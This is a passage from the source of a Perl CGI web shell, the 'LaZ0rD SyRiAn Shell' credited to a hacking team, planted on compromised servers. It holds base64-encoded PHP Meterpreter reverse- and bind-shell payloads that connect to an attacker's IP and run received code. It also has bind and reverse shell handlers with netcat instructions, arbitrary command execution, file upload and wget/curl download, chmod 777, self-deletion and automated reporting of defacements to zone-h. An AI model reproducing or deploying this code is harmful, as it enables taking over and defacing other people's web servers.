1121. print $sock "Accept: */*\r\n";
1122. print $sock "Referer: http://www.zone-h.org/component/option,com_notify/Itemid,89/task,single/\r\n";
1123. print $sock "Accept-Language: pt-br\r\n";
1124. print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
1125. print $sock "Connection: Keep-Alive\r\n";
1126. print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
1127. print $sock "Host: www.zone-h.org\r\n";
1128. $length=length("defacer=$hacker&domain=http%3A%2F%2 F$site[$a]&method=22&reason=5&option=com_notify");
1129. print $sock "Content-Length: $length\r\n";
1130. print $sock "Pragma: no-cache\r\n";
1131. print $sock "\r\n";
1132. print $sock "defacer=$hacker&domain=http%3A%2F%2F$site[$a]&method=22&reason=5&option=com_notify\r\n";
1133. close($sock);
1134. $a =$a +1;
1135. }
1136. text_end();
1137. }
1138. }
1139. our ($port,$ip,$meter_p,$filename,$meter_re,$meter_bind,$bind_port,$ip_r,$re_port,$bind_perl1,$bind_perl2,$bind_ruby,$bind_inetd,$bind_c);
1140. $bind_port = html_var('bind_port');
1141. $ip_r = html_var('ip_r');
1142. $re_port = html_var('re_port');
1143. ##############################################
1144. #----- [ Meterpreter Revers Connection ] ----#
1145. ##############################################
1146. if (html_var('action') eq "meter_revers")
1147. {
1148. msg_txt("[+] PHP Meterpreter -> Metasploit Revers Connection ....Ok \n[+]For Connection Go To metasploit : \nmsf>use exploit/multi/handler\nmsf>set payload php/meterpreter/reverse_tcp\nmsf>set LPORT ",html_var('re_port'),"\nmsf>set LHOST ",html_var('ip_r'),"\nmsf>exploit");
1149. use MIME::Base64;
1150. $port=html_var('re_port');
1151. $ip=html_var('ip_r');
1152. $meter_p="PD9waHAgZXJyb3JfcmVwb3J0aW5nKDApOyRpcCA9ICIlaXAlIjskcG9ydCA9ICVyZV9wb3J0JTtpZiAoRkFMU0UgIT09IHN0cnBvcygkaXAsICI6IikpIHsJJGlwID0gIlsiLiAkaXAgLiJdIjt9aWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgewkkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7CSRzX3R5cGUgPSAnc3RyZWFtJzt9IGVsc2VpZiAoKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgewkkcyA9ICRmKCRpcCwgJHBvcnQpOwkkc190eXBlID0gJ3N0cmVhbSc7fSBlbHNlaWYgKCgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7CSRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOwkkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2UgewlkaWUoJ25vIHNvY2tldCBmdW5jcycpO31pZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH1zd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7Y2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7fWlmICghJGxlbikgewlkaWUoKTt9JGEgPSB1bnBhY2soIk5sZW4iLCAkbGVuKTskbGVuID0gJGFbJ2xlbiddOyRiID0gJyc7d2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7CXN3aXRjaCAoJHNfdHlwZSkgeyAJY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOwljYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CX19JEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7ZXZhbCgkYik7ZGllKCk7Pz4=";
1153. $meter_p=decode_base64($meter_p);
1154. $meter_p=~s/%re_port%/$port/;
1155. $meter_p=~s/%ip%/$ip/;
1156. $filename="meter.php";
1157. $meter_re="ok";
1158. }
1159. ##############################################
1160. #------ [ Meterpreter Bind Connection ] -----#
1161. ##############################################
1162. if (html_var('action') eq "meter_bind")
1163. {
1164. $ip=html_var('ip');
1165. msg_txt("[+] PHP Meterpreter -> Metasploit Bind Connection $bind_port ....Ok \n[+]For Connection Go To metasploit : \nmsf>use exploit/multi/handler\nmsf>set payload php/meterpreter/bind_tcp\nmsf>set LPORT $bind_port\nmsf>set RHOST $ip\nmsf>exploit");
1166. use MIME::Base64;
1167. $port=$bind_port;
1168. $ip=html_var('ip');
1169. $meter_p="PD9waHAgJHBvcnQgPSAlYmluZF9wb3J0JTskaXBhZGRyID0gIiVpcCUiO2lmIChpc19jYWxsYWJsZSgnc3RyZWFtX3NvY2tldF9zZXJ2ZXInKSkgewkkc3J2c29jayA9IHN0cmVhbV9zb2NrZXRfc2VydmVyKCJ0Y3A6Ly97JGlwYWRkcn06eyRwb3J0fSIpOwlpZiAoISRzcnZzb2NrKSB7IGRpZSgpOyB9CSRzID0gc3RyZWFtX3NvY2tldF9hY2NlcHQoJHNydnNvY2ssIC0xKTsJJHNfdHlwZSA9ICdzdHJlYW0nO30gZWxzZWlmIChpc19jYWxsYWJsZSgnc29ja2V0X2NyZWF0ZV9saXN0ZW4nKSkgewkkc3J2c29jayA9IHNvY2tldF9jcmVhdGVfbGlzdGVuKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzID0gc29ja2V0X2FjY2VwdCgkc3J2c29jayk7CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2VpZiAoaXNfY2FsbGFibGUoJ3NvY2tldF9jcmVhdGUnKSkgewkkc3J2c29jayA9IHNvY2tldF9jcmVhdGUoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOwkkcmVzID0gc29ja2V0X2JpbmQoJHNydnNvY2ssICRpcGFkZHIsICRwb3J0KTsJaWYgKCEkcmVzKSB7IGRpZSgpOyB9CSRzID0gc29ja2V0X2FjY2VwdCgkc3J2c29jayk7CSRzX3R5cGUgPSAnc29ja2V0Jzt9IGVsc2UgewlkaWUoKTt9aWYgKCEkcykgeyBkaWUoKTsgfXN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhaztjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazt9aWYgKCEkbGVuKSB7CWRpZSgpO30kYSA9IHVucGFjaygiTmxlbiIsICRsZW4pOyRsZW4gPSAkYVsnbGVuJ107JGIgPSAnJzt3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsJc3dpdGNoICgkc190eXBlKSB7IAljYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7CWNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsJfX0kR0xPQkFMU1snbXNnc29jayddID0gJHM7JEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTtldmFsKCRiKTtkaWUoKTs=";
1170. $meter_p=decode_base64($meter_p);
1171. $meter_p=~s/%bind_port%/$bind_port/;
1172. $meter_p=~s/%ip%/$ip/;
1173. $filename="meter.php";
1174. $meter_bind="ok";
1175. }
1176. ##############################################
1177. #-------------- [ Bind Port ] ---------------#
1178. ##############################################
1179. # this is only the start
1180. if (html_var('action') eq "bind_port")
1181. {
1182. if (html_var('type') eq "perl1")
1183. {
1184. &text_start;
1185. print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
1186. &text_end;
1187. $bind_perl1="ok";
1188. }
1189. elsif(html_var('type') eq "perl2")
1190. {
1191. ##############################################
1192. #-------------- [ Bind Port 2]---------------#
1193. ##############################################
1194. if (html_var('type') eq "perl2")
1195. {
1196. &text_start;
1197. if ($os eq "Windows")
1198. {
1199. dont_work();
1200. }
1201. else
1202. {
1203. print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
1204. $bind_perl2="ok";
1205. }
1206. &text_end;
1207. }
1208. }
1209. elsif (html_var('type') eq "ruby")
1210. {
1211. ##############################################
1212. #------------ [ Bind Port Ruby ] ------------#
1213. ##############################################
1214. &text_start;
1215. print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
1216. &text_end;$bind_ruby="ok";
1217. }
1218. elsif(html_var('type') eq "inetd")
1219. {
1220. ##############################################
1221. #------------ [ Bind Port inetd] ------------#
1222. ##############################################
1223. &text_start;
1224. if ($os eq "Windows")
1225. {
1226. dont_work();
1227. }
1228. else
1229. {
1230. print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
1231. $bind_inetd="ok";
1232. }
1233. &text_end;
1234. }
1235. else
1236. {
1237. ##############################################
1238. #------------- [ Bind Port C ] -------------#
1239. ##############################################
1240.  
1241. if ($os eq "Windows")
1242. {
1243. dont_work();
1244. }
1245. else
1246. {
1247. &text_start;
1248. print "[+] bind port $bind_port ....Ok\n[+] now use netcat :nc -n $ENV{'SERVER_ADDR'} $bind_port";
1249. $bind_c="ok";
1250. &text_end;
1251. }
1252. }
1253. }
1254. ##############################################
1255. #---------------- [ Revers ] ----------------#
1256. ##############################################
1257. our($rev_perl1,$rev_perl2,$rev_perl3,$rev_sh,$rev_ruby);
1258. if (html_var('action') eq "revers")
1259. {
1260. if (html_var('type') eq "perl")
1261. {
1262. &text_start;
1263. print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
1264. &text_end;
1265. $rev_perl1="ok";
1266. }
1267. elsif(html_var('type') eq "perl2")
1268. {
1269. ##############################################
1270. #-------------- [ Revers PERL 2] ------------#
1271. ##############################################
1272. &text_start;
1273. if ($os eq "Windows")
1274. {
1275. dont_work();
1276. }
1277. else
1278. {
1279. print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
1280. $rev_perl2="ok";
1281. }
1282. &text_end;
1283. }
1284. elsif(html_var('type') eq "perl3")
1285. {
1286. ##############################################
1287. #-------------- [ Revers PERL 3] ------------#
1288. ##############################################
1289. &text_start;
1290. if ($os eq "Windows")
1291. {
1292. dont_work();
1293. }
1294. else
1295. {
1296. print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
1297. $rev_perl3="ok";
1298. }
1299. &text_end;
1300. }
1301. elsif(html_var('type') eq "sh")
1302. {
1303. ##############################################
1304. #----------------- [ Revers Sh] -------------#
1305. ##############################################
1306. &text_start;
1307. if ($os eq "Windows")
1308. {
1309. dont_work();
1310. }
1311. else
1312. {
1313. print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
1314. $rev_sh="ok";
1315. }
1316. &text_end;
1317. }
1318. elsif(html_var('type') eq "c")
1319. {
1320. ##############################################
1321. #------------ [ Revers Port C ] ------------#
1322. ##############################################
1323.  
1324. }
1325. else
1326. {
1327. ##############################################
1328. #-------------- [ Revers Ruby] --------------#
1329. ##############################################
1330. &text_start;
1331. print "[+] Revers port $re_port ....Ok \n[+] use netcat :nc -vv -l -p $re_port";
1332. &text_end;$rev_ruby="ok";
1333. }
1334. }
1335. ###########################################################
1336. ###########################################################
1337. ###-------------------- [ FunCt!0nS ] ------------------###
1338. ###########################################################
1339. ###########################################################
1340. #
1341. #
1342. #
1343. #
1344. ##############################################
1345. #-------------- [ Main ] ------------------#
1346. ##############################################
1347. sub Main
1348. {
1349. use FindBin qw{$RealBin};
1350. my $cookie_env=$ENV{'HTTP_COOKIE'};
1351. # GET Cookies....
1352. # You Can Use cookies like this : '$Cookies{cookie_name}'
1353. my @httpcookies = split(/; /,$cookie_env);
1354. foreach my $cookie(@httpcookies)
1355. {
1356. my ($id, $val) = split(/=/, $cookie);
1357. $Cookies{$id} = $val;
1358. }
1359. #defining the Opration system type
1360. if ($^O=~/win/i)
1361. {
1362. $os ="Windows"; # This SyStem is Windows so Fuck it ..!!
1363. }
1364. else
1365. {
1366. $os="Linux"; # This System is Linux so Have fun ..!!
1367. }
1368. # Header ....
1369. # Download File or normal header...
1370. if (html_var('action') ne "download")
1371. {
1372. # normal Header
1373. print header();
1374. style();
1375. java_code();
1376. }
1377. else
1378. {
1379. #download function
1380. download(html_var('filename'));
1381. }
1382. if(html_var('id') eq "logout")
1383. {
1384. # Logout ....
1385. Logout();
1386. }
1387. # did the user login or not
1388. if ($Cookies{'sy_shell'} ne create_session() or html_var('id') eq "logout")
1389. {
1390. Login_check();
1391. Login_page();
1392. CopyRight();
1393. exit();
1394. }
1395. # Chenge Dir
1396. if (html_var('pwd_dir'))
1397. {
1398. if (html_var('pwd_dir') ne $RealBin)
1399. {
1400. chdir(html_var('pwd_dir'));
1401. our $path=html_var('pwd_dir');
1402. }
1403. else
1404. {
1405. our $path=$RealBin;
1406. }
1407. }
1408. else
1409. {
1410. our $path=$RealBin;
1411. }
1412. # Main Cmd Execut
1413. if (html_var('id') eq "home")
1414. {
1415. if (html_var('action') eq "")
1416. {
1417. if ($os eq "Linux")
1418. {
1419. $cmd="ls -lia";
1420. }
1421. else
1422. {
1423. $cmd="dir"
1424. }
1425. msg_txt(Cmd($cmd)); # Execute The Cmd And Print The Resulte ...
1426. }
1427. }
1428. elsif(html_var('id') eq "Fuck")
1429. {
1430. # SuiCide
1431. if ($cgi->param('Delete') eq "Ok")
1432. {
1433. unlink($ENV{'SCRIPT_FILENAME'});
1434. shift_to("?id=home");
1435. }
1436. print '<body onload = "Suicide();">';
1437. exit();
1438. }
1439. elsif(html_var('id') eq "about")
1440. {
1441. # about
1442. about();
1443. }
1444. else
1445. {
1446. # Some Error ...!!!
1447. #shift_to("?id=home");
1448. }
1449. }
1450. ##############################################
1451. #------------ [ login session ] -------------#
1452. ##############################################
1453. sub create_session
1454. {
1455. use Digest::MD5 qw(md5_hex);
1456. return my $session = md5_hex($Username.":".$Password);
1457. }
1458. ##############################################
1459. #------------- [ Login staff ] --------------#
1460. ##############################################
1461. sub Login_check
1462. {
1463. if(html_var('pass') eq $Password and html_var('usrname') eq $Username)
1464. {
1465. # login ...ok
1466. my $tmp=create_session();
1467. print "
1468. <script>
1469. document.cookie='sy_shell=$tmp';
1470. var url = window.location.pathname;
1471. var filename = url.substring(url.lastIndexOf('/')+1);
1472. filename=filename+'?id=home';
1473. window.location=filename;
1474. </script>
1475. ";
1476. }
1477. else
1478. {
1479. # login ...error or user didnot login yet ...:):)
1480. if (html_var('usrname') or html_var('pass'))
1481. {
1482. print q[
1483. <script>
1484. alert ("Error !....0_o");
1485. </script>
1486. ];
1487. }
1488. }
1489. }
1490. ##############################################
1491. #------------- [ Cmd stuff ] ----------------#
1492. ##############################################
1493. sub Cmd
1494. {
1495. $|=1;
1496. my $cmd=shift;
1497. my $cm=$cmd;
1498. $cmd .= " |";
1499. my $cmd_txt="";
1500. open(CommandOutput, $cmd);
1501. while(<CommandOutput>)
1502. {
1503. $_ =~ s/(\n|\r\n)$//;
1504. $cmd_txt= "$cmd_txt $_\n";
1505. }
1506. $|=0;
1507. $cmd=$cm;
1508. return $cmd_txt;
1509. }
1510. ##############################################
1511. #--------------[ LoGin Page ] ---------------#
1512. ##############################################
1513. sub Login_page
1514. {
1515. # Just print Login Page ...
1516. print q[
1517. <html dir="ltr">
1518. <p align="center">
1519. <font face="Comic Sans MS" size="5" color="#CC0000">LaZ0rD SyRi</font><font face="Comic Sans MS" size="5" color="#008000">An Shell Professio</font><font face="Comic Sans MS" size="5" color="#808080">nal Version</font>
1520. </p>
1521. <div align="center" class="grey">
1522. <p>
1523. <font size="3">SyRiAn Fr33 TeAm <br>
1524. <br>
1525. <font size="2">SyRiAn HaCk3rS</font></p>
1526. <p>&nbsp;</p>
1527. </div>
1528.  
1529. <form name="txtauth" method="POST" onSubmit="encode(txtauth.usrname);encode(txtauth.pass);">
1530. <div align="center">
1531. <table border="0" cellpadding="4" cellspacing="0" style="border: 1px double #dedede;" dir="ltr">
1532. <tr>
1533. <td colspan="2" align="center">&nbsp;</td>
1534. </tr>
1535. <tr>
1536. <td>User:</td>
1537. <td>
1538. <input id="username" onblur="Blur('username','UserName')" onclick="Clear('username' ,'UserName')" type="text" name="usrname" value="UserName" size="20" maxlength="100" class="txtbox">
1539. </td>
1540. </tr>
1541. <tr>
1542. <td>Password:</td>
1543. <td>
1544. <input type="password" id="password" name="pass" value="" size="20" maxlength="100" class="txtbox">
1545. </td>
1546. </tr>
1547. <tr>
1548. <td align="left">&nbsp;</td>
1549. <td align="right">
1550. <p align="center">
1551. <input type="submit" name="login" value="Login">
1552. </p>
1553. </td>
1554. </tr>
1555. </table>
1556. </div>
1557. </form>
1558. ];
1559. # If You See this line So You Can Be Cheater :)
1560. if ($cgi->param('cheat') eq "MyNameIsCheater")
1561. {
1562. print "<hr><center>Hello Cheater , UserName is : $Username,And PaSsW0rD Is :$Password.<hr>";
1563. }
1564. }
1565. ##############################################
1566. #-------------- [ CopyRight ] ---------------#
1567. ##############################################
1568. sub CopyRight
1569. {
1570. print q[
1571. <font color="gray" size="-2">
1572. <p align="center">
1573. <b>
1574. <font color="#808080" face="Verdana" size="1">C0d3d by <sy>~~ [ </sy>LaZorD SyRiAn <sy>]~~ [ </sy>G3t Fr33 0r D!3 HarD <sy>] ~~&nbsp; </sy>SyRiAn Fr33 T3Am </font>
1575. </b>
1576. </p>
1577. <p align="center">
1578. <span lang="en-us">
1579. <b>
1580. <font size="1" face="Verdana" color="#DEDEDE">C</font></b></span><font size="1"><b><font face="Verdana" color="#DEDEDE">opyright © 20</font></b></font><span lang="en-us"><b><font size="1" face="Verdana" color="#DEDEDE">12</font>
1581. </b>
1582. </span>
1583. </p>
1584. </font>
1585. ];
1586. }
1587. ##############################################
1588. #--------------[ LoGout Page ] --------------#
1589. ##############################################
1590. sub Logout
1591. {
1592. print q[
1593. <script>
1594. document.cookie='sy_shell=4236a440a662cc8253d7536e5aa17942';
1595. </script>
1596. ];
1597. }
1598. ##############################################
1599. #---------------[ S H I F T To ]------------#
1600. ##############################################
1601. sub shift_to
1602. {
1603. my $to = shift;
1604. print "
1605. <script>
1606. var url = window.location.pathname;
1607. var filename = url.substring(url.lastIndexOf('/')+1);
1608. filename=filename+'$to';
1609. window.location=filename;
1610. </script>
1611. ";
1612. }
1613. ##############################################
1614. #--------------[ html forms ] ---------------#
1615. ##############################################
1616. sub html_var
1617. {
1618. use MIME::Base64;
1619. my $var = shift;
1620. if ($var ne "id")
1621. {
1622. if ($cgi->param($var) ne "")
1623. {
1624. return decode_base64($cgi->param($var));
1625. }
1626. else
1627. {
1628. return $cgi->param($var);
1629. }
1630. }
1631. else
1632. {
1633. return $cgi->param($var);
1634. }
1635. }
1636. ##############################################
1637. #--------------[ Java Code ] ----------------#
1638. ##############################################
1639. sub java_code
1640. {
1641. print q[
1642. <script>
1643. // Blur ...
1644. function Blur(id , defalutText)
1645. {
1646. if( document.getElementById(id).value == ''){document.getElementById(id).value = defalutText;}
1647. }
1648. function Clear(id , defalutText)
1649. {
1650. if( document.getElementById(id).value == defalutText)
1651. {
1652. document.getElementById(id).value = '';
1653. }
1654. }
1655. // Encode ...
1656. function encode(name)
1657. {
1658. var tmp = name;
1659. tmp.value = btoa(tmp.value);
1660. return true;
1661. }
1662. // Suicide
1663. function Suicide()
1664. {
1665. var confirmSuicide = confirm('Are You Sure You Wanna Delete the sh3ll ?');
1666. if(confirmSuicide == true)
1667. {
1668. document.location='?id=Fuck&Delete=Ok';
1669. }
1670. else
1671. {
1672. document.location='?id=home';
1673. }
1674. }
1675. //OUTPUT ....
1676. function Ch ()
1677. {
1678. if(document.getElementById('action_1').value == 'upload')
1679. {get_upload.enctype="multipart/form-data";document.getElementById('get').innerHTML = '<p align="center">Filename: <input name="fileme" size="35" type="file"><input type="hidden" name="action" value="dXBsb2Fk"></p>'; }
1680. else if (document.getElementById('action_1').value == 'download')
1681. {document.getElementById('get').innerHTML = '<input type="hidden" name="action" value="ZG93bmxvYWQ="><p align="center"><input type="text" id="download" onblur="Blur(download_u,download_u_v);" onclick="Clear(download_u,download_u_v);" name="filename" size="59" value="filename">';}
1682. else
1683. {document.getElementById('get').innerHTML = '<input type="hidden" name="action" value="ZmlsZWdldA=="><p align="center"><input type="text" name="fileUrl" id="file_url" onblur="Blur(file_u,file_u_v);" onclick="Clear(file_u,file_u_v);" size="59" value="http://www."><select name="getType"><option value="d2dldA==">Auto</option><option value="d2dldA==">wget</option><option value="Y3VybCAtbw==">curl -o</option><option value="Z2V0">get</option><option value="bHlueCAtc291cmNl">lynx -source</option></select>';}
1684. }
1685. function encode_get_upload()
1686. {
1687. if (get_upload.pwd_dir)
1688. {
1689. encode(get_upload.pwd_dir);
1690. }
1691. if (get_upload.fileUrl)
1692. {
1693. encode(get_upload.fileUrl);
1694. }
1695. if (get_upload.filename)
1696. {
1697. encode(get_upload.filename);
1698. }
1699. }
1700. // c....
1701. function ChangeInputs()
1702. {
1703. if(document.getElementById('actionType').value == 'rename')
1704. {document.getElementById('newName').innerHTML = '<p align="center"><input type="hidden" name="action" value="UmVuYW1lRmlsZQ=="><input type="text" name="RenameFile_a" id="commandLine4" value="File Name" size="40"> <input type="text" name="RenameFile_b" id="commandLine5" value="File New Name" size="40"> '; }
1705. else if (document.getElementById('actionType').value == 'delfile')
1706. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="delete_file" id="delet_fi" onblur="Blur(delet_file,delet_file_value);" onclick="Clear(delet_file,delet_file_value);" value="File or Folder Name" size="59"><select name="type"><option value="ZmlsZQ==">Delete File</option><option value="Zm9sZGVy">Delete Folder</option></select><input type="hidden" name="action" value="ZGVsZXRlZmlsZQ==">'; }
1707. else if (document.getElementById('actionType').value == 'copy')
1708. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="copy_a" id="copyfile_a" onblur="Blur(copyfiles_a,copyfiles_a_value);" onclick="Clear(copyfiles_a,copyfiles_a_value);" value="File 1" size="40"><input type="text" name="copy_b" id="copyfile_b" onblur="Blur(copyfiles_b,copyfiles_b_value);" onclick="Clear(copyfiles_b,copyfiles_b_value);" value="File 2" size="40"><input type="hidden" name="action" value="Y29weQ==">';}
1709. else if (document.getElementById('actionType').value == 'mkdir')
1710. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="foldername" id="makefolder" value="New Folder" onblur="Blur(make_folder,make_folder_value);" onclick="Clear(make_folder,make_folder_value);" size="40"><input type="hidden" name="action" value="bWtkaXI=">';}
1711. else if (document.getElementById('actionType').value == 'read_file')
1712. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="read" id="readfile" value="filename" onblur="Blur(read_file,read_file_value);" onclick="Clear(read_file,read_file_value);"size="40"><input type="hidden" name="action" value="cmVhZA=="><select name="type"><option value="cGVybA==">perl</option><option value="c3ltbGluaw==">SymLink</option></select>';}
1713. else if (document.getElementById('actionType').value == 'unZip')
1714. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="unzipname" id="unzipfile" value="Your zip File" onblur="Blur(unzip_file,unzip_file_value);" onclick="Clear(unzip_file,unzip_file_value);" size="40"><input type="hidden" name="action" value="dW56aXA=">';}
1715. else if (document.getElementById('actionType').value == '777')
1716. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="folder_f" id="folder_fin" value="Your Path" onblur="Blur(folder_find,folder_find_value);" onclick="Clear(folder_find,folder_find_value);" size="40"><input type="hidden" name="action" value="Nzc3">';}
1717. else if (document.getElementById('actionType').value == 'chmod')
1718. {document.getElementById('newName').innerHTML = '<p align="center"><input type="text" name="file" id="filec" value="filename.php" onblur="Blur(file_c,file_c_value);" onclick="Clear(file_c,file_c_value);" size="40"><input type="text" name="nu" value="777" size="40"><input type="hidden" name="action" value="Y2htb2Q=">';}
1719. else{document.getElementById('newName').innerHTML = '<p align="center"><input type="hidden" name="action" value="ZWRpdA=="><input type="text" name="filee" id="ede_file" onblur="Blur(edite_file,edite_file_value);" onclick="Clear(edite_file,edite_file_value);" value="Your File Path" size="40">'; }
1720. }
1721. // encode_file_handling
1722. function encode_file_handling()
1723. {
1724. if (file_handling.pwd_dir)
1725. {
1726. encode(file_handling.pwd_dir);
1727. }
1728. if (file_handling.RenameFile_a)
1729. {
1730. encode(file_handling.RenameFile_a);
1731. }
1732. if (file_handling.RenameFile_b)
1733. {
1734. encode(file_handling.RenameFile_b);
1735. }
1736. if (file_handling.filee)
1737. {
1738. encode(file_handling.filee);
1739. }
1740. if (file_handling.delete_file)
1741. {
1742. encode(file_handling.delete_file);
1743. }
1744. if (file_handling.copy_a)
1745. {
1746. encode(file_handling.copy_a);
1747. }
1748. if (file_handling.copy_b)
1749. {
1750. encode(file_handling.copy_b);
1751. }
1752. if (file_handling.foldername)
1753. {
1754. encode(file_handling.foldername);
1755. }
1756. if (file_handling.zipname)
1757. {
1758. encode(file_handling.zipname);
1759. }
1760. if (file_handling.unzipname)
1761. {
1762. encode(file_handling.unzipname);
1763. }
1764. if (file_handling.read)
1765. {
1766. encode(file_handling.read);
1767. }
1768. if (file_handling.genServpath)
1769. {
1770. encode(file_handling.genServpath);
1771. }
1772. if (file_handling.folder_f)
1773. {
1774. encode(file_handling.folder_f);
1775. }
1776. if (file_handling.file)
1777. {
1778. encode(file_handling.file);
1779. }
1780. if (file_handling.nu)
1781. {
1782. encode(file_handling.nu);
1783. }
1784. if (file_handling.for_dir)
1785. {
1786. encode(file_handling.for_dir);
1787. }
1788. }
1789. // evalOrEnc2
1790. function evalOrEnc2()
1791. {
1792. var temp;
1793. if(document.getElementById('evalOrEnc').value == 'eval')
1794. {
1795. temp = 'print "Hello,all";';
1796. }
1797. else if(document.getElementById('evalOrEnc').value == 'enc')
1798. {
1799. temp = 'my String To Encrypt';
1800. }
1801. else if(document.getElementById('evalOrEnc').value == 'analyze')
1802. {
1803. temp = 'c4ca4238a0b923820dcc509a6f75849b';
1804. }
1805. return temp;
1806. }
1807. function chen_eval(temp)
1808. {
1809. if (temp == 'print "Hello,all";')
1810. {
1811. scan_str.action.value='ZXZhbA==';
1812. }
1813. else if(temp == 'my String To Encrypt')
1814. {
1815. scan_str.action.value='ZW5j';
1816. }
1817. else if(temp == 'c4ca4238a0b923820dcc509a6f75849b')
1818. {
1819. scan_str.action.value='YW5hbHl6ZQ==';
1820. }
1821. document.getElementById('tool').value= temp;
1822. }
1823. // some var'z 0_×
1824. var edite_file = 'ede_file';
1825. var edite_file_value='Your File Path';
1826. var delet_file = 'delet_fi';
1827. var delet_file_value='File or Folder Name';
1828. var copyfiles_a = 'copyfile_a';
1829. var copyfiles_a_value='File 1';
1830. var copyfiles_b = 'copyfile_b';
1831. var copyfiles_b_value='File 2';
1832. var make_folder = 'makefolder';
1833. var make_folder_value='New Folder';
1834. var read_file='readfile';
1835. var read_file_value='filename';
1836. var folder_find = 'folder_fin';
1837. var folder_find_value = 'Your Path';
1838. var file_c = 'filec';
1839. var file_c_value = 'filename.php';
1840. var file_u = 'file_url';
1841. var file_u_v = 'http://www.';
1842. var download_u = 'download';
1843. var download_u_v = 'filename';
1844. </script>
1845. ];
1846. }
1847. ##############################################
1848. #---------------[textarea start ]------------#
1849. ##############################################
1850. sub text_start
1851. {
1852. print q[<textarea rows="24" readonly>];
1853. }
1854. ##############################################
1855. #---------------[textarea end ] -------------#
1856. ##############################################
1857. sub text_end
1858. {
1859. print q[</textarea>];
1860. }
1861. ##############################################
1862. #---------------[ msg_txt ] -------------#
1863. ##############################################
1864. sub msg_txt
1865. {
1866. text_start;
1867. print shift;
1868. text_end;
1869. }
1870. ##############################################
1871. #--------------[ About Page ] --------------#
1872. ##############################################
1873. sub about
1874. {
1875. print '
1876. <center><br>
1877. <table border="1" width="51%">
1878. <tr>
1879. <td width="83">
1880. <font color="gray" size="-2">Author:</font></td>
1881. <td>
1882. <font color="gray" size="-2">LaZ0rd SyRiAn </font></td>
1883. </tr>
1884. <tr>
1885. <td width="83">
1886. <font color="gray" size="-2">Author e-mail: </font></td>
1887. <td>
1888. <font color="gray" size="-2">
1889. <a href="mailto:LaZ0rd-SyRiAn@hacker.ps">
1890. LaZ0rd-SyRiAn@hacker.ps</a></font></td>
1891. </tr>
1892. <tr>
1893. <td width="83">
1894. <font color="gray" size="-2">Thanx : </font></td>
1895. <td>
1896. <font color="gray" size="-2">[ PLiiiJl~HaCKer ][ AmRaNhM ][ Error 404
1897. ] [ Anti-Trust ] [ BaD-HaCKeR-MaN ][ All Perl Geeks ]
1898. </font></td>
1899. </tr>
1900. <tr>
1901. <td align="center" valign="top" colspan="2">
1902. <font color="gray" size="-2">
1903. <p>I Am LaZ0rD SyRiAn [ Mike is My real name ] From SyRiAn
1904. Arabic Republic My Age 12/1994 </p>
1905. <p>I am (C , PERL , PHP , Paython , autoit,ruby) coder you
1906. can say Programming G33k</p>
1907. <p>My Team Is&nbsp; SyRiAn Fr33 T3AM </p>
1908. </font>
